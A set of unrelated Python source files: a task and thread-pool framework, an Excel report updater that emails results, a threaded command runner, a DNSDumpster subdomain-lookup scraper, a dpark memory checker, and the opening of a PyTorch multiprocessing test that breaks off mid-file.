if len(s_kwdargs) > 500:
s_kwdargs = s_kwdargs[:500]
self.logger.debug("Running %s(%s, %s)" % (
self.func.__name__, s_args, s_kwdargs))
s_args = None
s_kwdargs = None
try:
res = self.func(*self.args, **self.kwdargs)
self.done(res)
if self.logger:
self.logger.debug("Function returned %s" % (
str(res)))
except Exception as e:
if self.logger:
self.logger.error("Task '%s' terminated with exception: %s" %
(str(self), str(e)))
try:
(type, value, tb) = sys.exc_info()
self.logger.error("Traceback:\n%s" %
"".join(traceback.format_tb(tb)))
tb = None
except Exception:
self.logger.error("Traceback information unavailable.")
self.done(e)
class FuncTask2(FuncTask):
"""Simple task that calls func and returns func's return value.
This version lets you specify the positional and keyword arguments
more naturally 'in place' in the constructor.
"""
def __init__(self, func, *args, **kwdargs):
super(FuncTask2, self).__init__(func, args, kwdargs)
def set_logger(self, logger):
self.logger = logger
def make_tasker(func):
"""make_tasker takes a callable (function, method, etc.) and returns
a new factory function for generating tasks. Each factory function is
designed to consume its arguments and return a task that, when executed,
will call the function upon the arguments.
TODO: deprecate this and just use FuncTask, which is easier to
understand--must change a number of programs first.
"""
def anonFunc(*args, **kwdargs):
class anonTask(Task):
def execute(self):
self.logger.debug("Executing fn %s" % func)
try:
val = func(*args, **kwdargs)
self.logger.debug("Done executing fn %s" % func)
return val
except Exception as e:
# Log error message and re-raise exception.
self.logger.error("fn %s raised exception: %s" % (
func, str(e)))
raise e
return anonTask()
return anonFunc
# ------------ COMPOUND TASKS ------------
class SequentialTaskset(Task):
"""Compound task that runs a series of tasks sequentially.
"""
def __init__(self, taskseq):
super(SequentialTaskset, self).__init__()
self.tasklist = list(taskseq)
def initialize(self, taskParent, **kwdargs):
self.index = 0
super(SequentialTaskset, self).initialize(taskParent, **kwdargs)
def step(self):
"""Run the next child task and wait for completion (no timeout)."""
if self.index >= len(self.tasklist):
raise TaskError("step(): sequential compound task %s finished" % self)
self.check_state()
# Select next task from the set and advance the index
self.task = self.tasklist[self.index]
self.index += 1
return self.runTask(self.task)
def execute(self):
"""Run all child tasks, in order, waiting for completion of each.
Return the result of the final child task's execution.
"""
while self.index < len(self.tasklist):
res = self.step()
self.logger.debug('SeqSet task %i has completed with result %s' %
(self.index, res))
# Returns result of last task to quit
return res
def stop(self):
"""Interrupt/cancel execution, but will allow current child task
to complete."""
#self.ev_intr.set()
try:
self.task.stop()
except TaskError as e:
self.logger.error("Error cancelling child task: %s" % (str(e)))
def addTask(self, task):
"""Append a task to the task sequence. If the SequentialTaskset has
already completed execution, this will do nothing unless it is
restarted (initialize(), start()).
"""
self.tasklist.append(task)
class ConcurrentAndTaskset(Task):
"""Compound task that runs a set of tasks concurrently, and does not
return until they all terminate.
"""
def __init__(self, taskseq):
super(ConcurrentAndTaskset, self).__init__()
self.taskseq = taskseq
# tuning value for polling inefficiency
self.idletime = 0.001
# internal mutex
self._lock_c = threading.RLock()
def execute(self):
"""Run all child tasks concurrently in separate threads.
Return last result after all child tasks have completed execution.
"""
with self._lock_c:
self.count = 0
self.numtasks = 0
self.taskset = []
self.results = {}
self.totaltime = time.time()
# Start all tasks
for task in self.taskseq:
self.taskset.append(task)
self.numtasks += 1
task.init_and_start(self)
num_tasks = self.getNumTasks()
# Wait on each task to clean up results
while num_tasks > 0:
self.check_state()
for i in range(num_tasks):
try:
try:
task = self.getTask(i)
except IndexError:
# A task got deleted from the set. Jump back out
# to outer loop and repoll the number of tasks
break
#self.logger.debug("waiting on %s" % task)
res = task.wait(timeout=self.idletime)
#self.logger.debug("finished: %s" % task)
self.child_done(res, task)
except TaskTimeout:
continue
except Exception as e:
#self.logger.warning("Subtask propagated exception: %s" % str(e))
self.child_done(e, task)
continue
# wait a bit and try again
#self.ev_quit.wait(self.idletime)
# re-get number of tasks, in case some were added or deleted
num_tasks = self.getNumTasks()
# Scan results for errors (exceptions) and raise the first one we find
for key in self.results.keys():
value = self.results[key]
if isinstance(value, Exception):
(count, task) = key
self.logger.error("Child task %s terminated with exception: %s" % (
task.tag, str(value)))
raise value
# Return value of last child to complete
return value
def child_done(self, result, task):
with self._lock_c:
self.count += 1
self.logger.debug('Concurrent task %d/%d has completed' % (
self.count, self.numtasks))
self.taskset.remove(task)
self.totaltime += task.getExecutionTime()
self.results[(self.count, task)] = result
def stop(self):
"""Call stop() on all child tasks, and ignore TaskError exceptions.
Behavior depends on what the child tasks' stop() method does."""
with self._lock_c:
for task in self.taskset:
try:
task.stop()
except TaskError as e:
# Task does not have a way to stop it.
# TODO: notify who?
pass
# stop ourself
#self.ev_intr.set()
def addTask(self, task):
"""Add a task to the task set.
"""
# Try to start task first. If it fails then we don't need to
# undo adding it to taskset
task.initialize(self)
task.start()
with self._lock_c:
self.numtasks += 1
self.taskset.append(task)
def getTask(self, i):
with self._lock_c:
return self.taskset[i]
def getNumTasks(self):
"""Get the set of active tasks.
"""
with self._lock_c:
return len(self.taskset)
class QueueTaskset(Task):
"""Compound task that runs a set of tasks that it reads from a queue
concurrently. If _waitflag_ is True, then it will run each task to
completion before starting the next task.
"""
def __init__(self, queue, waitflag=True, timeout=0.1, ev_quit=None):
super(QueueTaskset, self).__init__()
self.queue = queue
self.waitflag = waitflag
self.lock = threading.RLock()
self.timeout = timeout
self.task = None
self.ev_cancel = threading.Event()
self.ev_pause = threading.Event()
if ev_quit is None:
ev_quit = threading.Event()
self.ev_quit = ev_quit
def flush(self):
# Flush queue of pending tasks
self.logger.debug("Flushing queue.")
while True:
try:
self.queue.get(block=False)
except Queue.Empty:
break
def stop(self):
self.flush()
#self.ev_intr.set()
try:
if self.task:
self.task.stop()
except TaskError as e:
#self.logger.error("Error cancelling child task: %s" % (str(e)))
pass
# put termination sentinel
self.queue.put(None)
def stop_child(self):
self.flush()
try:
if self.task:
self.task.stop()
except TaskError as e:
#self.logger.error("Error cancelling child task: %s" % (str(e)))
pass
def execute(self):
self.count = 0
self.totaltime = 0
self.logger.debug("Queue Taskset starting")
while not self.ev_quit.is_set():
try:
self.check_state()
task = self.queue.get(block=True, timeout=self.timeout)
if task is None:
# termination sentinel
break
self.task = task
task.register_callback(self.child_done, args=[task])
with self.lock:
self.count += 1
self.ev_cancel.clear()
try:
task.initialize(self)
self.logger.debug("Starting task '%s'" % str(task))
task.start()
if self.waitflag:
res = task.wait()
self.logger.debug("Task %s terminated with result %s" % (
(str(task), str(res))))
except Exception as e:
self.logger.error("Task '%s' terminated with exception: %s" %
(str(task), str(e)))
try:
(type, value, tb) = sys.exc_info()
self.logger.debug("Traceback:\n%s" %
"".join(traceback.format_tb(tb)))
# NOTE: to avoid creating a cycle that might cause
# problems for GC--see Python library doc for sys
# module
tb = None
except Exception as e:
self.logger.debug("Traceback information unavailable.")
# If task raised exception then it didn't call done,
task.done(e, noraise=True)
except Queue.Empty:
# No task available. Continue trying to get one.
continue
# TODO: should we wait for self.count > 0?
self.logger.debug("Queue Taskset terminating")
return self.result
def child_done(self, result, task):
with self.lock:
self.count -= 1
self.totaltime += task.getExecutionTime()
self.result = result
def cancel(self):
self.flush()
super(QueueTaskset, self).cancel()
def addTask(self, task):
self.queue.put(task)
# ------------ PRIORITY QUEUES ------------
class PriorityQueue(Queue.PriorityQueue):
pass
# ------------ WORKER THREADS ------------
class _WorkerReset(Exception):
"""Local exception used to reset a worker thread."""
pass
class WorkerThread(object):
"""Container for a thread in which to call the execute() method of a task.
A WorkerThread object waits on the task queue, executes a task when it
appears, and repeats. A call to start() is necessary to start servicing
the queue, and a call to stop() will terminate the service.
"""
def __init__(self, queue, logger=None, ev_quit=None,
timeout=0.2, tpool=None):
self.queue = queue
self.logger = logger
self.timeout = timeout
if ev_quit:
self.ev_quit = ev_quit
else:
self.ev_quit = threading.Event()
self.tpool = tpool
self.lock = threading.RLock()
self.status = 'stopped'
self.time_start = 0.0
def setstatus(self, status):
"""Sets our status field so that others can inquire what we are doing.
Set of status:
starting, idle
"""
with self.lock:
self.status = status
def getstatus(self):
"""Returns our status--a string describing what we are doing.
"""
with self.lock:
return (self.status, self.time_start)
def execute(self, task):
"""Execute a task.
"""
taskid = str(task)
res = None
try:
# Try to run the task. If we catch an exception, then
# it becomes the result.
self.time_start = time.time()
self.setstatus('executing %s' % taskid)
self.logger.debug("now executing task '%s'" % taskid)
try:
res = task.execute()
except UserTaskException as e:
res = e
except Exception as e:
self.logger.error("Task '%s' raised exception: %s" %
(str(task), str(e)))
res = e
try:
(type, value, tb) = sys.exc_info()
self.logger.debug("Traceback:\n%s" %
"".join(traceback.format_tb(tb)))
# NOTE: to avoid creating a cycle that might cause
# problems for GC--see Python library doc for sys
# module
tb = None
except Exception as e:
self.logger.debug("Traceback information unavailable.")
finally:
self.logger.debug("done executing task '%s'" % str(task))
self.setstatus('cleaning %s' % taskid)
# Wake up waiters on other threads
task.done(res, noraise=True)
self.time_start = 0.0
self.setstatus('idle')
# Basic task execution loop. Dequeue a task and run it, then look
# for another one
def taskloop(self):
self.setstatus('starting')
self.logger.debug('Starting worker thread loop.')
# If we were handed a thread pool upon startup, then register
# ourselves with it.
if self.tpool:
self.tpool.register_up()
try:
self.setstatus('idle')
while not self.ev_quit.is_set():
try:
# Wait on our queue for a task; will timeout in
# self.timeout secs
(priority, task) = self.queue.get(block=True,
timeout=self.timeout)
if task is None:
# termination sentinel
self.queue.put((priority, task))
break
self.execute(task)
except _WorkerReset:
self.logger.info("Worker reset!")
except Queue.Empty as e:
# Reach here when we time out waiting for a task
pass
finally:
self.logger.debug('Stopping worker thread loop.')
if self.tpool:
self.tpool.register_dn()
self.setstatus('stopped')
def start(self):
self.thread = threading.Thread(target=self.taskloop, args=[])
self.thread.start()
def stop(self):
# Put termination sentinal on queue
self.queue.put((0, None))
self.ev_quit.set()
# ------------ THREAD POOL ------------
class ThreadPool(object):
"""A simple thread pool for executing tasks asynchronously.
self.status states:
down no threads are ready for service
up all threads are ready for service
start threads are starting, but not all of them are up yet
stop threads are stopping, but not all of them are down yet
"""
def __init__(self, numthreads=1, logger=None, ev_quit=None,
workerClass=WorkerThread):
self.numthreads = numthreads
self.logger = logger
if ev_quit:
self.ev_quit = ev_quit
else:
self.ev_quit = threading.Event()
self.lock = threading.RLock()
self.workerClass = workerClass
self.queue = PriorityQueue()
self.workers = []
self.tids = []
# Used to synchronize thread pool startup (see register() method)
self.regcond = threading.Condition()
self.runningcount = 0
self.status = 'down'
def startall(self, wait=False, **kwdargs):
"""Start all of the threads in the thread pool. If _wait_ is True
then don't return until all threads are up and running. Any extra
keyword arguments are passed to the worker thread constructor.
"""
self.logger.debug("startall called")
with self.regcond:
while self.status != 'down':
if self.status in ('start', 'up') or self.ev_quit.is_set():
# For now, abandon additional request to start
self.logger.error("ignoring duplicate request to start thread pool")
return
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
#assert(self.status == 'down')
if self.ev_quit.is_set():
return
self.runningcount = 0
self.status = 'start'
self.workers = []
if wait:
tpool = self
else:
tpool = None
# Start all worker threads
self.logger.debug("starting threads in thread pool")
for i in range(self.numthreads):
t = self.workerClass(self.queue, logger=self.logger,
ev_quit=self.ev_quit, tpool=tpool,
**kwdargs)
self.workers.append(t)
t.start()
# if started with wait=True, then expect that threads will register
# themselves and last one up will set status to "up"
if wait:
# Threads are on the way up. Wait until last one starts.
while self.status != 'up' and not self.ev_quit.is_set():
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
else:
# otherwise, we just assume the pool is up
self.status = 'up'
self.logger.debug("startall done")
def addThreads(self, numthreads, **kwdargs):
with self.regcond:
# Start all worker threads
self.logger.debug("adding %d threads to thread pool" % (
numthreads))
for i in range(numthreads):
t = self.workerClass(self.queue, logger=self.logger,
ev_quit=self.ev_quit, tpool=self.tpool,
**kwdargs)
self.workers.append(t)
t.start()
self.numthreads += numthreads
def stopall(self, wait=False):
"""Stop all threads in the worker pool. If _wait_ is True
then don't return until all threads are down.
"""
self.logger.debug("stopall called")
with self.regcond:
while self.status != 'up':
if self.status in ('stop', 'down') or self.ev_quit.is_set():
# For now, silently abandon additional request to stop
self.logger.warning("ignoring duplicate request to stop thread pool.")
return
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
#assert(self.status == 'up')
self.logger.debug("stopping threads in thread pool")
self.status = 'stop'
# Signal to all threads to terminate.
self.ev_quit.set()
if wait:
# Threads are on the way down. Wait until last one quits.
while self.status != 'down':
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
self.logger.debug("stopall done")
def workerStatus(self):
return list(map(lambda t: t.getstatus(), self.workers))
def addTask(self, task, priority=0):
"""Add a task to the queue of tasks.
The task will be executed in a worker thread as soon as one is available.
Tasks are executed in first-come-first-served order.
"""
self.queue.put((priority, task))
def delTask(self, taskid):
self.logger.error("delTask not yet implemented")
def purgeTasks(self):
self.logger.error("purgeTasks not yet implemented")
def register_up(self):
"""Called by WorkerThread objects to register themselves.
Acquire the condition variable for the WorkerThread objects.
Increment the running-thread count. If we are the last thread to
start, set status to 'up'. This allows startall() to complete
if it was called with wait=True.
"""
with self.regcond:
self.runningcount += 1
tid = thread.get_ident()
self.tids.append(tid)
self.logger.debug("register_up: (%d) count is %d" %
(tid, self.runningcount))
if self.runningcount == self.numthreads:
self.status = 'up'
self.regcond.notify()
def register_dn(self):
"""Called by WorkerThread objects to register themselves.
Acquire the condition variable for the WorkerThread objects.
Decrement the running-thread count. If we are the last thread to
start, release the ThreadPool thread, which is stuck in start()
"""
with self.regcond:
self.runningcount -= 1
tid = thread.get_ident()
self.tids.remove(tid)
self.logger.debug("register_dn: count_dn is %d" % self.runningcount)
self.logger.debug("register_dn: remaining: %s" % str(self.tids))
if self.runningcount == 0:
self.status = 'down'
self.regcond.notify()
# ------------ SUPPORT FUNCTIONS ------------
_lock_seqnum = threading.Lock()
_count_seqnum = 0
def get_tag(taskParent):
global _count_seqnum
with _lock_seqnum:
generic_id = 'task%d' % (_count_seqnum)
_count_seqnum += 1
if taskParent:
tag = str(taskParent) + '.' + generic_id
else:
tag = generic_id
return tag
#END
|
Update_xl_thread.py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 7 15:53:26 2018
@author: Vadim Shkaberda
"""
from db_connect_sql import DBConnect
from log_error import writelog
from os import path
from pyodbc import Error as SQLError
from send_mail import send_mail
from xl import copy_file, update_file
import sharepoint
import sys
import threading
import time
class Main(object):
def __init__(self, fileinfo):
# Info about last file
self.fileinfo = fileinfo
self.sleep_duration = 30 # if no files to update
self.errors = {} # error description
# keys for SQL parsing
self.parse_keys = ('fname', 'fpath', 'reportID', 'reportName', 'Notifications', 'Attachments',
'NotificationsWhom', 'NotificationsCopy', 'Notificationstext', 'SecondResourceLink',
'GroupName')
def db_update(self, dbconn):
''' Function loads info about file update to db.
'''
if self.fileinfo['update_error'] == 0:
dbconn.successful_update(self.fileinfo['reportID'],
self.fileinfo['update_time'])
else:
# 6 - problem with Outlook. Send mail using SQL Server.
if self.fileinfo['update_error'] == 6:
dbconn.send_emergency_mail(self.fileinfo['reportName'])
else:
send_mail(subject='(Ошибка обновления) ' + self.fileinfo['reportName'],
HTMLBody=('ID ошибки: ' + str(self.fileinfo['update_error']) +
'. ' + self.errors[self.fileinfo['update_error']] + '<br>' +
'Отчёт: ID ' + str(self.fileinfo['reportID']) + ' <a href="' +
path.join(self.fileinfo['fpath'], self.fileinfo['fname']) + '">' +
self.fileinfo['reportName'] + '</a>.'), rName=self.fileinfo['reportName'])
dbconn.failed_update(self.fileinfo['reportID'],
self.fileinfo['update_time'],
self.fileinfo['update_error'])
# clear info about last file
for key in self.fileinfo.keys():
self.fileinfo[key] = None
def email_gen(self, dbconn=None):
''' Returns a dictionary with keywords for mail.
"dbconn" parameter signalized that it is a group mail.
'''
# choose Group- or reportName and create path(-es) to attachment(-s)
if dbconn:
subj = self.fileinfo['GroupName']
att = []
for group_att in dbconn.group_attachments(self.fileinfo['GroupName']):
att.append(path.join(group_att[0], group_att[1]))
else:
subj = self.fileinfo['reportName']
att = [path.join(self.fileinfo['fpath'], self.fileinfo['fname'])] \
if self.fileinfo['Attachments'] else None
return {'to': self.fileinfo['NotificationsWhom'],
'copy': self.fileinfo['NotificationsCopy'],
'subject': '(Автоотчет) ' + subj + \
' (' + self.fileinfo['update_time'][:10] + ')', # date in brackets
'HTMLBody': self.fileinfo['Notificationstext'],
'att': att,
'rName': self.fileinfo['reportName']
}
def parse_SQL(self, file_sql):
''' Turns result from SQL query into a dictionary.
'''
for i in range(11):
self.fileinfo[self.parse_keys[i]] = file_sql[i]
def time_to_sleep(self):
''' Sleep before next cycle.
'''
now = time.localtime()
if now.tm_hour >= 20 or now.tm_hour < 6:
print('{}. No files to update.'
.format(time.strftime("%d-%m-%Y %H:%M:%S", now)))
time.sleep(3600)
return
print('{}. No files to update. Waiting {} seconds.'
.format(time.strftime("%d-%m-%Y %H:%M:%S", now), self.sleep_duration))
time.sleep(self.sleep_duration)
if self.sleep_duration < 450:
self.sleep_duration *= 2
##### Working cycles. #####
def run(self):
''' Init cycle. Connects to database. Writes info about the last file
to db, if the error has occured after file update.
'''
with DBConnect() as dbconn:
# download error description from db
for err in dbconn.error_description():
self.errors[err[0]] = err[1]
# if info wasn't written to db after last file update
if self.fileinfo['fname']:
self.db_update(dbconn)
# run main cycle
self.main_cycle(dbconn)
print('Exiting run...')
def main_cycle(self, dbconn):
''' Main cycle. Gets info about file, calls update_file function
(that runs macro "Update" in Excel file) and saving result to db.
'''
# check if thread was user interrupted
while thread.is_alive():
# get file
file_sql = dbconn.file_to_update()
# if no files to update
if file_sql is None:
self.time_to_sleep()
continue
self.parse_SQL(file_sql)
# Calling function to work with Excel
print('{}'.format(time.strftime("%d-%m-%Y %H:%M:%S", time.localtime())), end=' ')
self.fileinfo['update_error'] = update_file(self.fileinfo['fpath'],
self.fileinfo['fname'])
self.fileinfo['update_time'] = time.strftime("%d-%m-%Y %H:%M:%S",
time.localtime())
# Copy file
if self.fileinfo['update_error'] == 0 and self.fileinfo['SecondResourceLink']:
self.fileinfo['update_error'] = copy_file(self.fileinfo['fpath'],
self.fileinfo['fname'],
self.fileinfo['SecondResourceLink'])
# Send mail
if self.fileinfo['update_error'] == 0 and self.fileinfo['Notifications'] == 1:
# if we have no group - send mail
if not self.fileinfo['GroupName']:
self.fileinfo['update_error'] = send_mail(**self.email_gen())
# if we have GroupName - send mail if group_mail_check == 1
elif dbconn.group_mail_check(self.fileinfo['GroupName']):
self.fileinfo['update_error'] = send_mail(**self.email_gen(dbconn))
# Write in the db result of update and send mail in a case of a failure
self.db_update(dbconn)
time.sleep(3)
self.sleep_duration = 30
print('Exiting main cycle...')
def control_thread():
''' Function that monitors user input.
If 1 have been inputed:
function is exiting, causing interruption of main()'''
while True:
output = input("Press 1 if you want to interrupt programm.\n")
if output == '1':
print('Programm is interrupted.')
break
print('Exiting daemon...')
if __name__ == "__main__":
# Start thread that monitors user input
thread = threading.Thread(target=control_thread)
# Python program exits when only daemon threads are left
thread.daemon = True
thread.start()
connection_retry = [0, time.time()]
# Initialize with no info about file
FileInfo = {'fname': None,
'fpath': None,
'reportID': None,
'reportName': None,
'update_error': None,
'update_time': None,
'Notifications': None,
'Attachments': None,
'NotificationsWhom': None,
'NotificationsCopy': None,
'Notificationstext': None,
'SecondResourceLink': None,
'GroupName': None}
main = Main(FileInfo)
sharepoint.sharepoint_check() # check connection to sharepoint
while connection_retry[0] < 10 and thread.is_alive():
try:
main.run()
except SQLError as e:
writelog(e)
# reset connection retries counter after 1 hour
if time.time() - connection_retry[1] > 3600:
connection_retry = [0, time.time()]
print(e)
connection_retry[0] += 1
# magnify sleep interval in case of repeatable connect failure
t_sleep = 900 if connection_retry[0] == 9 else 20
print('Retrying to connect in {} seconds. \
Number of retries since the first fixed dicsonnect in 24 hours: {}'
.format(t_sleep, connection_retry[0]))
time.sleep(t_sleep)
# in case of unexpected error - try to send email from SQL Server
except Exception as e:
writelog(e)
try:
with DBConnect() as dbconn:
dbconn.send_crash_mail()
finally:
sys.exit()
print('Exiting program.')
|
exec_cmd.py
|
# coding=utf-8
import logging
import os
import subprocess
import threading
logger = logging.getLogger(__name__)
def run(call_args, call_back, call_back_args):
(cwd, ignored) = os.path.split(call_args[0])
try:
logger.info("Running %r in %s." % (call_args, cwd))
subprocess.check_call(call_args, cwd=cwd)
except subprocess.CalledProcessError as (e):
logger.warn("Could not execute cmd : %s, got return code %r." % (call_args[0], e.returncode))
tmp_list = list(call_back_args)
tmp_list.append(e.returncode)
call_back_args = tuple(tmp_list)
if call_back and hasattr(call_back, '__call__'):
call_back(*call_back_args)
def execute_cmd(cmd_path, cmd_args, call_back=None, *call_back_args):
if cmd_args:
call_args = [cmd_path]
call_args.extend(cmd_args)
else:
call_args = [cmd_path]
thread = threading.Thread(target=run, args=(call_args, call_back, call_back_args))
thread.start()
return 0
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def test(*args):
print len(args)
print repr(args)
import time
execute_cmd("/bin/ls", ["-l", "/home"], test, "test")
time.sleep(2)
execute_cmd("/bin/ls", ["-l", "/error"], test, "test")
time.sleep(2)
execute_cmd("/bin/ls", ["-l", "/home/pi"], test)
time.sleep(2)
execute_cmd("/bin/ls", ["-l", "~"])
time.sleep(2)
|
dnsdumpster.py
|
import re
import threading
import requests
import hashlib
import urllib
class DNSDUMPSTER:
COOKIES = {'csrftoken' : ''}
DATA = {'csrfmiddlewaretoken' : '', 'targettip': ''}
SERVICE = "DNSDumpster"
LOCK = threading.Semaphore(value=1)
URL = "https://dnsdumpster.com"
REGEXP = "([a-z0-9]+[.])+%s"
TIMEOUT = 10
RESPONSE = ""
SUBDOMAINS = []
AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
HEADERS = {
'User-Agent' : '',
'Referer' : '',
}
def __init__(self, _class, _dm):
self.session = requests.Session()
self.baseclass = _class
self.domain = _dm
self.DATA['targettip'] = self.domain
self.regexp = self.REGEXP % (self.domain)
self.headers = self.headerer( self.HEADERS, self.AGENT )
def headerer(self, headers, _ag):
headers['User-Agent'] = _ag
headers['Referer'] = "https://dnsdumpster.com"
headers['Origin'] = "https://dnsdumpster.com"
return headers
def acquire_csrf(self, html):
obj = re.search(r"<input type='hidden' name='csrfmiddlewaretoken' value='(.*?)' />", html, re.IGNORECASE)
if obj:
return obj.groups()[0]
def execute(self):
_th = threading.Thread(target=self.request)
_th.daemon = True
_th.start()
def request(self):
self.baseclass.THREADS += 1
try:
req = self.session.get(self.URL, headers=self.headers, timeout=self.TIMEOUT)
if req.status_code < 400:
csrf = self.acquire_csrf(req.text)
self.COOKIES['csrftoken'] = csrf
self.DATA['csrfmiddlewaretoken'] = csrf
req = self.session.post(self.URL, data=self.DATA, cookies=self.COOKIES, headers=self.headers, timeout=self.TIMEOUT)
self.RESPONSE = req.text
self.extract()
self.append()
except Exception as e:
self.append()
self.baseclass.THREADS -= 1
def append(self, error=False):
self.LOCK.acquire()
self.baseclass.move( self.SERVICE, self.SUBDOMAINS )
self.LOCK.release()
def extract(self):
links = re.findall(r"<td class=\"col-md-4\">(.*?)<br>", self.RESPONSE)
for link in links:
if link.endswith(self.domain):
if link not in self.SUBDOMAINS:
self.SUBDOMAINS.append(link)
|
memory.py
|
import os
import sys
import time
import psutil
import resource
import threading
import platform
from dpark.utils.log import get_logger
logger = get_logger(__name__)
ERROR_TASK_OOM = 3
class MemoryChecker(object):
""" value in MBytes
only used in mesos task
start early
"""
def __init__(self):
self.rss = 0
self._stop = False
self.mf = None
self.check = True
self.addation = 0
self.mem = 100 << 30
self.ratio = 0.8
self.thread = None
self.task_id = None
self.oom = False
@property
def mem_limit_soft(self):
return int(self.mem * self.ratio)
def add(self, n):
self.addation += n
@property
def rss_rt(self):
return self.mf().rss + self.addation
@classmethod
def maxrss(cls):
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * 1024
def _kill(self, rss, from_main_thread):
template = "task used too much memory: %d MB > %d MB * 1.5," \
"kill it. use -M argument or taskMemory " \
"to request more memory."
msg = template % (rss >> 20, self.mem >> 20)
logger.warning(msg)
if from_main_thread:
os._exit(ERROR_TASK_OOM)
else:
if sys.version[0] == 3:
import _thread
else:
import thread as _thread
self.oom = True
_thread.interrupt_main()
def after_rotate(self):
limit = self.mem_limit_soft
self.rss = rss = self.rss_rt
if rss > limit * 0.9:
if rss > self.mem * 1.5:
self._kill(rss, from_main_thread=True)
else:
new_limit = max(limit, rss) * 1.1
self.ratio = new_limit / self.mem * 1.1
logger.info('after rotate, rss = %d MB, enlarge soft memory limit %d -> %d MB, origin = %d MB',
rss >> 20,
limit >> 20,
self.mem_limit_soft >> 20,
self.mem >> 20)
def _start(self):
p = psutil.Process()
logger.debug("start mem check thread")
if hasattr(p, "memory_info"):
self.mf = getattr(p, "memory_info")
else:
self.mf = getattr(p, 'get_memory_info')
mf = self.mf
def check_mem():
while not self._stop:
rss = self.rss = (mf().rss + self.addation) # 1ms
if self.check and rss > self.mem * 1.5:
self._kill(rss, from_main_thread=False)
time.sleep(0.1)
self.thread = t = threading.Thread(target=check_mem)
t.daemon = True
t.start()
def start(self, task_id, mem_limit_mb):
self._stop = False
self.mem = int(mem_limit_mb) << 20
self.task_id = task_id
if not self.thread:
self._start()
self.thread.name = "task-%s-checkmem" % (task_id,)
def stop(self):
self._stop = True
self.thread.join()
self.thread = None
def set_oom_score(score=100):
if platform.system() == 'Linux':
pid = os.getpid()
entry = "oom_score_adj"
path = "/proc/{}/{}".format(pid, entry)
try:
with open(path, "w") as f:
f.write("{}".format(score))
except:
pass
|
test_multiprocessing.py
|
# Owner(s): ["module: multiprocessing"]
import contextlib
import gc
import os
import sys
import time
import unittest
import copy
from sys import platform
import torch
import torch.cuda
import torch.multiprocessing as mp
import torch.utils.hooks
from torch.nn import Parameter
from torch.testing._internal.common_utils import (TestCase, run_tests, IS_WINDOWS, NO_MULTIPROCESSING_SPAWN, TEST_WITH_ASAN,
load_tests, slowTest, TEST_WITH_TSAN)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
TEST_REPEATS = 30
HAS_SHM_FILES = os.path.isdir('/dev/shm')
TEST_CUDA_IPC = torch.cuda.is_available() and \
sys.platform != 'darwin' and \
sys.platform != 'win32'
TEST_MULTIGPU = TEST_CUDA_IPC and torch.cuda.device_count() > 1
class SubProcess(mp.Process):
def __init__(self, tensor):
super(SubProcess, self).__init__()
self.tensor = tensor
self.daemon = True
def run(self):
self.tensor.add_(3)
def _test_cuda_ipc_deadlock_actor(queue, iterations):
for i in range(iterations):
if not queue.empty():
queue.get()
time.sleep(.01)
def _test_cuda_ipc_deadlock_learner(queue, iterations):
net = torch.nn.LSTM(1, 1).cuda()
for i in range(iterations):
if not queue.full():
queue.put(copy.deepcopy(net.state_dict()))
time.sleep(.01)
def simple_fill(queue, event):
data = queue.get()
data[0][:] = 4
event.set()
def simple_pool_fill(tensor):
tensor.fill_(4)
return tensor.add(1)
def send_tensor(queue, event, device, dtype):
t = torch.ones(5, 5, device=device, dtype=dtype)
queue.put(t)
queue.put(t)
event.wait()
def send_and_delete_tensors(queue, event, device, dtype, count, size=5):
for i in range(count):
t = torch.full([size], i, device=device, dtype=dtype)
queue.put(t)
del t
event.wait()
def receive_and_send_sum(queue, out_queue, event, device, dtype, count, size=5):
s = torch.full([size], 0, device=device, dtype=dtype)
for i in range(count):
t = queue.get()
s += t
out_queue.put(s)
event.wait()
def receive_and_send(queue, out_queue, event, count):
for i in range(count):
t = queue.get()
out_queue.put(t.clone())
event.wait()
def sum_tensors(inq, outq):
with torch.cuda.device(1):
tensors = inq.get()
for tensor in tensors:
outq.put((tensor.sum().item(), tensor.get_device(),
tensor.numel(), tensor.storage().size()))
def queue_get_exception(inqueue, outqueue):
os.close(2) # hide expected error message
try:
torch.zeros(5, 5).cuda()
except Exception as e:
outqueue.put(e)
else:
outqueue.put('no exception')
# Multiply by two in a separate stream
def cuda_multiply_two(queue, ready, done):
ready.set()
with torch.cuda.stream(torch.cuda.Stream()):
cuda_event, tensor = queue.get()
cuda_event.wait()
tensor.mul_(2)
cuda_event.record()
done.set()
del cuda_event
def requires_grad_variable_sharing(queue, ready):
var = queue.get()
ready.set()
queue.put(var.requires_grad)
def integer_parameter_serialization(iparam):
iparam + 1
def autograd_sharing(queue, ready, master_modified, device, is_parameter):
var = queue.get()
ready.set()
master_modified.wait()
expected_var = torch.arange(1., 26, device=device).view(5, 5)
expected_var[0, 0] = 1000
is_ok = var.data.equal(expected_var)
var.data[:] = torch.ones(5, 5, device=device)
is_ok &= var.grad is None
is_ok &= not var._backward_hooks
if is_parameter:
is_ok &= type(var) == Parameter
else:
is_ok &= type(var) == torch.Tensor
var._grad = torch.ones(5, 5, device=device)
queue.put(is_ok)
def mixed_type_producer(queue, event):
for _ in range(10):
float_tensor = torch.ones(2, 2).float().cuda()
byte_tensor = torch.zeros(2, 2).byte().cuda()
queue.put(float_tensor)
queue.put(byte_tensor)
event.wait()
event.clear()
def simple_autograd_function(a=1):
torch.rand(3).requires_grad_(True).mean().backward()
return a ** 2
@contextlib.contextmanager
def fs_sharing():
prev_strategy = mp.get_sharing_strategy()
mp.set_sharing_strategy('file_system')
try:
yield
finally:
mp.set_sharing_strategy(prev_strategy)
class leak_checker(object):
def __init__(self, test_case):
self.checked_pids = [os.getpid()]
self.test_case = test_case
def __enter__(self):
self.next_fds = self._get_next_fds(10)
return self
def __exit__(self, *args):
if torch.cuda.is_available():
torch.cuda.ipc_collect()
if args[0] is None:
# Check that the 10th available file-descriptor at the end of the
